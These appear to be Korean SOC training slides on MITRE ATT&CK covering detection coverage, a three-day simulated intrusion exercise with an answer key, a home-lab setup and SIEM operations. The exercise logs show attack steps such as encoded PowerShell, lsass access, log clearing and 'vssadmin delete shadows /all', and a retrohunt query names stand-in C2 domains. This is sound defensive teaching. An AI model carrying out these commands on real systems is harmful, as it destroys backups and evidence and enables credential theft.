개인정보보호법	개인정보 무단 접근 탐지, 유출 탐지 및 신고	Collection, Exfiltration Coverage; DLP 연동
망분리 규정	업무망-인터넷망 분리, 불법 접속 탐지	Lateral Movement, C2 탐지 Coverage 강화
클라우드 보안인증(CSAP)	클라우드 자원 보호, 접근 제어, 감사 로그	T1078.004 Cloud Accounts, CloudTrail Coverage

규제 감사 시 ATT&CK 활용

Coverage 분석 결과 = 탐지 현황 증빙 자료
탐지 룰 목록 + ATT&CK 태그 = 보안 통제 목록
헌팅 플레이북 = 능동 보안 활동 증빙
Purple Team 결과 = 탐지 유효성 검증 증빙
Coverage 개선 로드맵 = 지속 개선 계획 증빙

💡 핵심 원칙: ATT&CK 기반 보안 운영은 규제를 위한 형식적 준수가 아니라 실질적 보안 강화를 위한 도구. Coverage가 높으면 규제 준수는 자연스럽게 따라옴

보강 설명 ISMS-P, 금융보안원 전자금융감독규정 등 국내 보안 규제 요구사항을 ATT&CK Coverage와 연계하는 방법을 다룹니다. 규제 준수와 실질적 보안 강화를 동시에 달성하는 접근입니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

ISMS-P금융보안개인정보보호법

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
ISMS-P·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

Zero Trust 아키텍처와 ATT&CK: 공격 경로 차단 매핑

신뢰하지 말고 항상 검증 — Zero Trust가 ATT&CK 주요 공격 경로를 어떻게 막는가

Zero Trust

Zero Trust 원칙	구현 방법	차단하는 ATT&CK Technique
명시적 검증	MFA, 디바이스 등록, 위치 기반 조건부 접근	T1078 Valid Accounts, T1550 PtH
최소 권한	필요한 최소 권한만 부여, JIT(Just-In-Time) 접근	T1078.002 Domain Accounts, T1098 권한 조작
마이크로 세그멘테이션	워크로드 간 통신 화이트리스트 기반 허용	T1021 Lateral Movement, T1570 도구 전파
지속적 모니터링	모든 접근을 로그로 기록, 이상 탐지 상시 운영	전체 Tactic — 탐지 시간 단축
기기 신뢰 검증	디바이스 상태(패치 수준, 보안 솔루션) 확인 후 접근	T1190 Exploit, T1133 Remote Services

Zero Trust가 특히 효과적인 ATT&CK 경로

Lateral Movement 차단: 서버 간 직접 통신 차단 → SMB/RDP 기반 이동 불가
자격증명 탈취 후 남용 차단: MFA + 디바이스 등록 → 탈취 해시·비밀번호로 접근 불가
내부자 위협 제한: 최소 권한으로 접근 가능 데이터 범위 축소

💡 ATT&CK × Zero Trust 시너지: ATT&CK Coverage 분석으로 어떤 공격 경로가 남아있는지 파악하고, Zero Trust 구현으로 그 경로를 구조적으로 차단하면 탐지와 예방이 동시에 강화됩니다

보강 설명 Zero Trust는 신뢰하지 말고 항상 검증하라는 보안 원칙입니다. ATT&CK의 주요 공격 경로인 Lateral Movement와 Valid Accounts를 Zero Trust가 어떻게 차단하는지 연결합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

Zero TrustNever Trust Alway…Lateral Movement…

이해 포인트

Zero Trust를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Never Trust Always Verify 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

AI/ML 기반 이상 탐지와 ATT&CK Coverage

룰 기반 탐지의 사각지대를 ML이 보완 — 단 설명 가능성과 오탐 관리가 핵심 과제

AI 보안

ML이 효과적인 ATT&CK 탐지 영역

T1078 Valid Accounts: 사용자 행동 Baseline 학습 → Impossible Travel, 이상 접근 시간 탐지
T1071 C2 Beaconing: 네트워크 트래픽 패턴 분석 → 정기적 통신 주기 자동 탐지
T1110 Brute Force 변형: 속도 제한된 공격, 계정 분산 패턴 탐지
Discovery: 내부 환경 정찰 행위 패턴 (예: 갑자기 많아진 내부 DNS 쿼리)
Exfiltration: 데이터 전송 이상(양, 시간, 대상) 복합 탐지

ML 탐지의 한계와 과제

설명 가능성: "이상 점수 85점"만으로는 SOC 분석 불가 → 근거 제시 필요
오탐률: Baseline 학습 초기에 오탐 다수 → 적응 기간 필요
드리프트: 정상 행동이 변하면 재학습 필요 (재택근무 도입 등)
ATT&CK 매핑 어려움: ML 경보 → Technique 연결에 추가 분석 필요

✅ 실무 권장: ML 탐지 = 룰 기반 탐지의 대체재가 아닌 보완재. ML 경보에 반드시 ATT&CK 근거와 로그 증거를 추가해서 보고하는 워크플로우 설계 필요

보강 설명 AI/ML 기반 이상 탐지는 ATT&CK 탐지 Coverage를 높이는 데 기여할 수 있습니다. 특히 Valid Accounts, Discovery 같이 정상과 구분이 어려운 Technique에 유효합니다. 단… 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

AI 이상 탐지UEBAML 모델

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
AI 이상 탐지를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

팀 과제: 전체 모의 침해 시나리오 분석 (30분)

3인 팀 구성 → 15개 로그 분석 → ATT&CK 매핑 → 탐지 개선안 → 5분 발표

팀 종합 과제

시나리오 배경

국내 제조업체 A사 SOC에서 다음 이상 징후가 감지되었습니다. 이벤트는 3일에 걸쳐 발생했으며, 총 15개의 로그 이벤트가 수집되었습니다. 이 로그들을 분석해 공격 체인을 재구성하고, 각 단계의 탐지 가능 여부와 개선안을 제시하시오.

제출 요구사항

공격 타임라인 (시간 순 정렬)
ATT&CK 매핑표 (Tactic/Technique/근거/Confidence)
탐지 공백 식별 (어떤 단계를 못 잡았는가)
탐지 룰 개선 제안 2개
30초 경영진 보고 문장

━ Day 1 11/18 ━ 09:14 메일GW: xlsm 첨부 수신 (VT 3/94) 09:31 EDR: WINWORD→cmd→ps -enc 체인 09:32 DNS: update-svc.net 첫 쿼리 (생성 5일) 09:33 FW: ALLOW 10.0.0.55→93.11.2.4:443 ━ Day 2 11/19 ━ 03:22 WinEvent 4625: admin 실패 ×8 (DC) 03:28 WinEvent 4624: admin 성공 (LogonType 3) 03:31 Sysmon 1: net group "Domain Admins" 03:35 Sysmon 10: lsass.exe 접근 (unknown_svc) 03:44 WinEvent 4698: WindowsDefUpdate 등록 ━ Day 3 11/20 ━ 02:01 File: \\filesvr\Engineering\ 2,847개 복사 02:33 FW: 10.0.0.55→DropBox.com 4.1GB Upload 02:45 WinEvent 1102: 보안 로그 삭제 02:47 EDR: vssadmin delete shadows /all 02:51 File: 엔지니어링 파일 .enc 확장자 변경

보강 설명 팀 과제로 주어진 전체 모의 침해 시나리오를 분석합니다. 로그 15개를 분석해 공격 체인을 완성하고 탐지 개선안을 제안하는 종합 과제입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

팀 과제전체 시나리오공격 체인

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
팀 과제를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

팀 과제 해설 — 3일 침해 체인 전체 매핑

Day 1 피싱 → Day 2 내부 확산 → Day 3 데이터 유출 + 랜섬웨어 — 완전한 침해 체인

팀 과제 해설

시간	로그	Tactic	Technique	핵심 근거
Day1 09:14	메일GW	Initial Access	T1566.001	xlsm + VT 3/94 의심
Day1 09:31	EDR	Execution	T1059.001 + T1027	WINWORD→PS -enc 체인
Day1 09:32	DNS	C&C	T1568 + T1071.001	5일 된 신규 도메인
Day2 03:22	WinEvent	Credential Access	T1110.001	DC 대상 8회 실패
Day2 03:28	WinEvent	Initial Access(재)	T1078.002	admin 계정 네트워크 로그인
Day2 03:31	Sysmon	Discovery	T1069.002	Domain Admins 그룹 열거
Day2 03:35	Sysmon	Credential Access	T1003.001	lsass.exe 메모리 접근
Day2 03:44	WinEvent	Persistence	T1053.005	%ProgramData% 위치 예약작업
Day3 02:01	File	Collection	T1039	Engineering 폴더 2,847개
Day3 02:33	FW	Exfiltration	T1567.002	Dropbox 4.1GB 업로드
Day3 02:45	WinEvent	Defense Evasion	T1070.001	보안 로그 삭제
Day3 02:47	EDR	Impact	T1490	vssadmin shadows 삭제
Day3 02:51	File	Impact	T1486	.enc 확장자 변경 = 랜섬웨어

🚨 탐지 공백: Day1 09:32 DNS 쿼리에서 탐지했어야 했지만 신규 도메인 경보 없음. Day2 03:22 DC Brute Force 경보는 있었으나 후속 대응 없음 = 2번의 탐지 기회를 놓쳐 Day3 피해 발생

보강 설명 팀 과제 해설입니다. 3일에 걸친 완전한 침해 체인입니다. 각 팀 발표 후 해설을 공개하고, 다른 해석이 있으면 함께 토론합니다. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

T1486팀 과제 해설3일 침해 체인

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1486를 고를 때 대체 설명도 함께 적기

치트시트 5: 탐지 룰 설계 원칙 10가지

새 룰을 만들 때마다 이 체크리스트를 확인하면 품질이 올라간다

치트시트

ATT&CK Technique에 연결했는가? Tactic과 Sub-technique까지 명확히 연결

Data Source/Component를 확인했는가? 필요한 로그가 SIEM에 수집되고 있는가

탐지 조건이 구체적인가? "이상 행위" 대신 정확한 이벤트 ID, 필드, 값

알려진 정상 케이스를 제외했는가? 화이트리스트, 서비스 계정, 정상 도구 제외

임계값 근거가 있는가? Baseline 데이터 기반, 임의 숫자 금지

심각도(Level) 설정이 맞는가? 실제 위험도와 탐지 정확도를 반영

다음 조사 가이드가 포함되었는가? 경보 발화 시 분석가가 무엇을 봐야 하는지

플레이북 연결이 있는가? 이 경보가 발화하면 어떤 SOAR 플레이북 실행

검증 계획이 있는가? Atomic Red Team 또는 Purple Team으로 검증 일정

문서화가 완료되었는가? 목적·설계 이유·변경 이력이 Sigma 또는 문서에 기록

보강 설명탐지 룰 설계 시 항상 참고할 수 있는 원칙 카드입니다. 룰을 만들 때마다 이 체크리스트를 확인하면 품질이 높아집니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 효율이 올라갑니다.

룰 설계 원칙체크리스트ATT&CK 기반

복습 포인트

룰 설계 원칙 핵심 정의를 한 문장으로 다시 말하기
체크리스트와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

ATT&CK 기반 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

ATT&CK 실무 활용 핵심 도구 생태계

오픈소스 중심 — 각 도구가 ATT&CK 사이클의 어느 단계를 지원하는지 매핑

도구 생태계

 공격 시뮬레이션
Atomic Red Team — Technique별 공격 시뮬레이션 스크립트. github.com/redcanaryco
CALDERA — MITRE 공식 자율 공격 시뮬레이션 플랫폼. caldera.mitre.org
Sliver — 오픈소스 C2 프레임워크. Red Team용


 탐지 룰·TI
Sigma — SIEM 플랫폼 중립 탐지 룰 형식. github.com/SigmaHQ
MISP — 위협 인텔리전스 공유 플랫폼. misp-project.org
YARA — 파일 기반 멀웨어 탐지 패턴 언어
OpenCTI — CTI 관리 플랫폼


 Coverage·분석
ATT&CK Navigator — Coverage 시각화. mitre-attack.github.io
Vectr — Purple Team 활동 관리. vectr.io
MITRE CAR — Analytics 저장소. car.mitre.org
DetectionLab — 실습 환경 자동 구축

 포렌식·조사
Velociraptor — 대규모 엔드포인트 조사 플랫폼
DFIR-ORC — Windows 포렌식 아티팩트 수집
Volatility — 메모리 포렌식 분석 프레임워크


 네트워크 분석
Zeek — 네트워크 트래픽 분석 프레임워크
Suricata — 고성능 IDS/IPS/NSM
Wireshark — 패킷 캡처·분석


 SIEM·플랫폼
Elastic Stack (ELK) — 오픈소스 SIEM 플랫폼
Wazuh — 오픈소스 XDR/SIEM
Security Onion — 올인원 보안 모니터링

보강 설명 ATT&CK을 실무에 활용하기 위한 핵심 도구들을 정리합니다. 무료 오픈소스 도구 위주로 소개하며, 각 도구가 어떤 ATT&CK 활동을 지원하는지 매핑합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

오픈소스 보안 도구Atomic Red TeamCaldera

이해 포인트

오픈소스 보안 도구를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Atomic Red Team 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

집에서 ATT&CK 실습 환경 구축하기

DetectionLab + Atomic Red Team — 집 PC에서 공격 시뮬레이션과 탐지 실습이 가능한 환경

실습 환경

최소 하드웨어 요구사항

CPU: 8코어 이상 (가상화 지원 필수)
RAM: 16GB 이상 (32GB 권장)
저장소: 100GB 이상 여유 공간
OS: Windows 10/11 Pro (Hyper-V 활성화) 또는 Linux (KVM)

DetectionLab 구성 요소

DC01: Windows Server 2019 (Active Directory)
WEF01: Windows Event Forwarding 서버
WIN10: Windows 10 클라이언트 (Sysmon 포함)
HELK: ELK 기반 SIEM + Kibana 대시보드
GitHub: github.com/clong/DetectionLab

DetectionLab 다운로드 & 설치

git clone https://github.com/clong/DetectionLab
cd DetectionLab/Vagrant && vagrant up

Atomic Red Team 설치 (WIN10)

Install-Module -Name invoke-atomicredteam
Import-Module invoke-atomicredteam

Technique 시뮬레이션 실행

Invoke-AtomicTest T1053.005 -TestNumbers 1

HELK Kibana에서 탐지 확인

https://192.168.38.105:5601 → Sysmon 대시보드 확인 → 탐지 여부 분석

보강 설명 집에서 ATT&CK 실습 환경을 구축하는 방법입니다. DetectionLab이나 HELK로 빠르게 SIEM 환경을 만들고 Atomic Red Team으로 공격 시뮬레이션을 실습할 수 있습니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

DetectionLabHELK실습 환경

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
DetectionLab를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

수강 후 자가 학습 로드맵 — ATT&CK 전문가 성장 경로

이 모듈은 시작이다 — 실무 경험 + 자기 학습 + 커뮤니티로 계속 성장하라

자가 학습

 3개월 이내
DetectionLab 구축 + Atomic Red Team 실습
MITRE ATT&CK 공식 사이트 전체 독파 (하루 2~3 Technique)
Sigma 룰 5개 직접 작성
DFIR.training 무료 강의 수강
TryHackMe SOC Level 1 Path 완료


 6~12개월
GCIA (GIAC Certified Intrusion Analyst) 준비
GCIH (GIAC Certified Incident Handler) 준비
Hack The Box / Blue Team Labs 정기 실습
오픈소스 Sigma Rule 기여 (PR 제출)
내부 Purple Team 1회 기획·주도


 커뮤니티 활동
KISA 정보보호 커뮤니티 — 국내 보안 이슈 공유
DFIR.kr — 국내 포렌식·사고대응 커뮤니티
ATT&CK Slack — attack-community.slack.com
보안 컨퍼런스: ISEC, CODEGATE, Black Hat 발표 시청
블로그 작성: 분석 사례·실습 결과 공개 문서화

✅ 핵심 원칙: 교육 → 실습 → 공유 → 피드백의 사이클을 반복하는 것이 가장 빠른 성장 방법입니다. ATT&CK는 암기가 아니라 반복 분석으로 체득됩니다.

보강 설명 이번 모듈을 수강한 후 계속 성장하기 위한 자가 학습 로드맵입니다. 자격증, 온라인 학습 자료, 커뮤니티 활동을 통해 ATT&CK 전문가로 성장하는 경로를 제시합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

자가 학습보안 자격증GCIA GCIH

이해 포인트

자가 학습를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
보안 자격증 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

수고하셨습니다 — 강의 평가 안내

여러분의 피드백이 이 과정을 더 좋은 교육으로 만듭니다

마무리

수료 기준 확인

☑ ATT&CK 14개 Tactic 이해 및 설명 가능
☑ 로그를 보고 Technique 매핑 가능
☑ 탐지 룰 작성 기초 역량 습득
☑ 헌팅 가설 수립 방법 이해
☑ 30초 보고 문장 작성 가능
☑ 캡스톤 과제 제출 완료

🎓 수료 후 이어지는 모듈:
Module 6: AI 기반 보안 운영 자동화
Module 7: 클라우드 보안 운영 실무
Module 8: 위협 인텔리전스 고급 과정

강의 평가 항목

① 학습 목표 달성도 (1~5점)
② 강의 내용의 실무 적용 가능성
③ 실습·시나리오 분석의 유익함
④ 강사 설명의 명확성
⑤ 전체 만족도
⑥ 다른 동료에게 추천 의향 (NPS)

📋 평가 링크: 제공된 QR 코드 또는 URL을 통해 평가를 제출해 주세요. 개인 식별 정보 없이 익명으로 처리됩니다.

보강 설명수강생들의 노고에 감사를 전하고 강의 평가를 요청합니다. 피드백이 다음 모듈 개선에 반영된다는 점을 안내합니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

수료 축하강의 평가피드백

설명 확장

수료 축하 기준으로 첫 단서를 먼저 분류하기
강의 평가를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

모듈 마무리: ATT&CK으로 설명하고, 로그로 증명하고, 액션으로 끝낸다

좋은 SOC 분석가의 기준을 한 페이지에 정리 — 개념 이해에서 실무 적용으로 넘어가는 체크포인트

모듈 정리

✅ 수료 기준 문장: 공격 이벤트를 단편적으로 보는 수준을 넘어, 공격 흐름·탐지 공백·즉시 대응을 연결해서 말할 수 있으면 이 모듈의 핵심 목표를 달성한 것입니다.

배운 것

14개 Tactic과 주요 Technique, 로그 근거 해석, Data Source와 Coverage 개념, 탐지 설계 사고방식을 익혔습니다.

할 수 있는 것

로그를 ATT&CK에 매핑하고, 공격 체인을 설명하고, 탐지 룰·헌팅 가설·대응 액션으로 이어서 제안할 수 있습니다.

다음 단계

Purple Team 검증, Coverage 개선, SIEM/SOAR 룰 튜닝, 보고 문장 표준화까지 실제 운영 체계로 확장해야 합니다.

현업에 바로 옮길 3가지

설명: 사건 발생 시 ATT&CK 언어로 일관되게 기록
증명: 각 판단마다 로그 한 줄 또는 데이터 소스 근거를 명시
행동: 차단, 추가 수집, 룰 개선 중 무엇을 할지 즉시 제안

보강 설명 이 페이지는 모듈 전체에서 배운 내용을 실무 분석가 관점으로 묶어 주는 마무리 슬라이드입니다. ATT&CK을 아는 수준에서 끝나지 않고, 로그를 근거로 삼아 판단하고 바로 행동 제안까지 이어지는 분석 습관을 강조해 주세요.

모듈 정리ATT&CK실무 전환

정리 질문

지금 바로 ATT&CK으로 설명할 수 있는가
그 판단을 뒷받침할 로그 근거가 있는가
다음 행동을 1분 안에 제안할 수 있는가

운영 기준

근거 없는 확신 대신 Confidence를 함께 적기
차단과 후속 조사를 구분해 우선순위를 두기
재발 방지용 개선 backlog를 남기기

복습 방향

대표 Technique 5개를 로그 예시와 함께 다시 보기
실습 문제를 ATT&CK 문장으로 재서술하기
팀 내 보고 문장 표준 템플릿에 적용해 보기

SIEM 아키텍처: 로그가 경보가 되기까지

수집 → 파싱 → 정규화 → 상관 분석 → 경보 — 각 단계의 병목이 탐지 품질을 결정한다

SIEM 운영 심화

로그 수집 (Collection)

Syslog, WinEvent Forwarding, Agent, API 방식으로 로그 수집. 수집 실패 모니터링 필수 — 수집 안 되면 Coverage 자동 감소

파싱 (Parsing)

원본 로그를 필드별로 분리. 파싱 실패 시 탐지 룰 동작 안 함 — 파싱 오류율 모니터링 필요

정규화 (Normalization)

다양한 소스의 로그를 공통 스키마로 통일. IP, 사용자명, 타임스탬프 형식 표준화 → 상관 분석 가능

인덱싱 & 검색 (Indexing)

빠른 검색을 위한 인덱스 생성. 보존 기간(retention) 설정 — 규제 요구사항(1년 이상) 고려

상관 분석 & 경보

룰 엔진이 이벤트를 매핑해 경보 생성. ATT&CK 태그 자동 부착. SOAR로 경보 전달

SIEM 운영 흔한 실패 포인트

로그 미수집: 에이전트 다운, 방화벽 차단 → Coverage 0점 구간 발생
파싱 실패: 로그 형식 변경 시 파서 미업데이트 → 필드 null
타임존 불일치: 서버별 다른 타임존 → 상관 분석 오류
과도한 보존 비용: 모든 로그 저장 vs 중요 로그만 선별
경보 피로: 오탐 많은 룰 방치 → 중요 경보 묻힘

💡 운영 모니터링 필수 지표:
일일 수집 로그량 추이 / 파싱 실패율 / 소스별 수집 지연 / 경보 발화 수 / 오탐률 변화

보강 설명 SIEM이 어떻게 동작하는지 내부 아키텍처를 이해하면 탐지 룰 설계와 Coverage 분석이 더 정확해집니다. 로그 수집 → 파싱 → 정규화 → 상관 분석 → 경보의 파이프라인을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

SIEM 아키텍처로그 파이프라인정규화

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
SIEM 아키텍처·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

로그 보존 정책: 규제 요건과 비용 최적화의 균형

Hot(즉시검색) → Warm(검색가능) → Cold(아카이브) — 계층별 저장으로 비용과 요건을 동시에 충족

SIEM 운영 심화

로그 유형	권장 보존 기간	규제 근거	우선도
인증·접근 로그 (WinEvent 4624/4625)	1년 이상	ISMS-P, 금융보안규정	최고
보안 장비 로그 (WAF, FW, IPS)	1년 이상	개인정보보호법	최고
시스템 감사 로그 (auditd, Sysmon)	6개월~1년	ISMS-P	높음
응용 프로그램 로그	3~6개월	내부 정책	중간
네트워크 흐름 로그 (NetFlow)	3개월	내부 정책	중간
DNS 로그	1~3개월	C2 탐지 소급 분석용	중간
디버그·개발 로그	1~4주	—	낮음

Hot/Warm/Cold 계층 아키텍처

Hot (0~30일): 빠른 SSD 스토리지, 실시간 검색 가능, 탐지 룰 실행 대상
Warm (30일~6개월): 일반 HDD, 검색 가능하나 속도 느림, 소급 분석용
Cold (6개월~3년): 오브젝트 스토리지(S3 등), 검색 불가 아카이브, 규제 준수용

⚠️ 소급 분석(Retrohunting): 새 IOC가 발견되었을 때 과거 로그를 소급해 분석. 보존 기간이 짧으면 공격 초기 단계 증거를 잃을 수 있음. 최소 6개월 Hot/Warm 유지 권장

보강 설명 로그 보존 기간은 규제 요구사항과 포렌식 필요성을 모두 고려해야 합니다. 비용 최적화를 위한 Hot/Warm/Cold 아키텍처도 설명합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

로그 보존 정책규제 요구Hot Warm Cold

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

소급 탐지(Retrohunting): 새 IOC로 과거 로그 재분석

공격자는 수개월 전부터 활동했다 — 새 IOC 발견 시 과거 로그 소급 분석이 필수

SIEM 운영 심화

소급 탐지가 필요한 상황

새 IOC 수신: TI 피드에서 새 C2 도메인·IP 발표 → 과거 DNS/Proxy 로그에서 히트 여부 확인
인시던트 후 분석: 공격 초기 단계 흔적 소급 → 공격 시작 시점과 경로 파악
CVE 공개 후: 새 취약점 POC 공개 → 이전 웹 로그에서 익스플로잇 시도 확인
CTI 보고서 발표 후: APT 그룹 TTP 공개 → 과거 로그에 동일 패턴 존재 여부 확인

# 소급 탐지 쿼리 예시 (Splunk) # 신규 C2 도메인 수신 후 과거 90일 소급 index=dns earliest=-90d latest=now query IN ("evil-c2.xyz", "update-cdn-api.net") | table _time, src_ip, query, answer | sort _time # 결과: 60일 전부터 내부 10.0.0.55 히트!

소급 탐지 프로세스

IOC/TTP 수신 — TI 피드, CTI 보고서, 인시던트 분석 결과

조회 기간 결정 — 공격자 평균 잠복 기간 고려 (APT: 수개월)

소급 쿼리 실행 — DNS, Proxy, FW, EDR 각 소스별 조회

히트 시 인시던트 전환 — 관련 전체 로그 수집, ATT&CK 매핑 시작

🚨 소급 탐지가 불가한 이유 TOP 3:
① 보존 기간이 짧아 로그 삭제됨
② DNS 로그를 SIEM에 수집하지 않음
③ 파싱 오류로 쿼리 필드 없음

보강 설명 소급 탐지는 새로운 IOC나 TTP가 발견되었을 때 과거 로그를 소급해서 분석하는 기법입니다. SolarWinds 같은 사건에서 공격자가 수개월 전부터 활동했음을 사후에 발견하는 핵심 방법입니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Retrohunting소급 탐지새 IOC 적용

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Retrohunting·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

SIEM 대시보드 설계: ATT&CK 기반 SOC 운영 현황판

숫자만이 아닌 ATT&CK 언어로 — SOC 현황을 한눈에 파악하는 대시보드 구성

SIEM 운영 심화

필수 대시보드 패널 구성

Tactic별 일일 경보 건수: 14개 Tactic 중 어디서 경보가 많이 발생하는지 히트맵
Top 10 Technique 경보: 이번 주 가장 많이 탐지된 Technique 순위
Coverage 현황: 점수 0/1/2/3 비율 파이 차트 — 개선 추이 추적
미처리 경보 현황: 담당자 미배정, 24시간 이상 미처리 경보 목록
MTTD/MTTR 추이: 탐지 시간과 대응 시간 주간 변화
로그 수집 상태: 소스별 수집량, 파싱 오류율, 지연 여부

SOC 운영 현황 대시보드 (예시)

오늘 경보 발화

42건

↓ 전일 대비 12% 감소

미처리 경보

8건

⚠ 3건 24시간 초과

Tactic별 경보 분포

Exec

Pers

Cred

Disc

Exf

Coverage: Score3 42% | Score2 26% | Score1 20% | Score0 12%

